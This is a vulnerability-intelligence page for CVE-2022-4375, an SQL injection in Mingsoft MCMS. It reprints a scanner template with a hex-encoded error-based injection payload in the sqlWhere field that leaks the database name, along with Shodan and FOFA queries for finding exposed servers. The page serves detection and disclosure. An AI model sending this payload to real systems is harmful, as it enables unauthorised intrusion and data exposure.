SQL injection in Mingsoft MCMS up to 5.2.9 via sqlWhere parameter, critical severity.
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
NVD | CVE-2022-4375 | 9 Dec 202208:15 | – | nvd |
CVE | CVE-2022-4375 | 9 Dec 202208:15 | – | cve |
Github Security Blog | Mingsoft MCMS vulnerable to SQL Injection | 9 Dec 202209:30 | – | github |
Veracode | SQL Injection | 12 Dec 202207:07 | – | veracode |
Prion | Sql injection | 9 Dec 202208:15 | – | prion |
Cvelist | CVE-2022-4375 Mingsoft MCMS list sql injection | 9 Dec 202200:00 | – | cvelist |
OSV | Mingsoft MCMS vulnerable to SQL Injection | 9 Dec 202209:30 | – | osv |
id: CVE-2022-4375
info:
name: Mingsoft MCMS - SQL Injection
author: ritikchaddha
severity: critical
description: |
SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation: |
Apply the vendor-supplied patch or update to the latest version.
reference:
- https://gitee.com/mingSoft/MCMS/issues/I61TG5
- https://nvd.nist.gov/vuln/detail/CVE-2022-4375
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4375
cwe-id: CWE-89,CWE-707
epss-score: 0.00263
epss-percentile: 0.6564
cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: mingsoft
product: mcms
shodan-query: http.favicon.hash:1464851260
fofa-query: icon_hash="1464851260"
tags: cve,cve2022,mingsoft,mcms,sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "mingsoft.net"
internal: true
- raw:
- |
POST /cms/category/list? HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d
matchers-condition: and
matchers:
- type: word
part: body
words:
- "java.sql.SQLSyntaxErrorException"
- "java.sql.SQLException"
condition: or
- type: word
part: body
words:
- "Icategorydao.xml"
- "cms_category"
condition: or
- type: status
status:
- 500
- 200
# digest: 4b0a00483046022100b52660dbfc278d0fb902f7b6ad6409c6f8d11eb36a8428bdcf548c90599288af022100f326ca6a4d977c1eb324020c939b918044cc75049970d0050a2db9a0e3adccf8:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo